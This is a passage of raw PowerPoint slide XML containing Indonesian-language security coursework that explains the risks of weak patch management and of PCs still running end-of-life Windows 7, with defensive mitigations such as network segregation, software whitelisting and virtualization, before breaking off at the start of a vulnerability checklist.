              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</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176</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212033340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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> patch management yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> pada PC dan laptop</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utamanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (vulnerabilities)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh malware, ransomware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Patch management yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>celah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> exploit kit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bug lama (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada Windows) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengendalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Windows 7 dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>mitigasinya</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Windows 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>end-of-life</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Januari 2020 → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Microsoft.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PC sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kompatibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern (antivirus, EDR, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>makin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada Windows 7.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Mitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Segregasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pisahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PC Windows 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internet dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN/firewall).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Whitelisting software:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> endpoint security yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows 7.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> software lama di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual Windows 7 di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host modern (Windows 11/Linux).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>migrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pindah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. Checklist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>: Default settings, Unsecured root accounts, Open ports and services, Unsecure protocols, Weak encryption, Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Semuanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
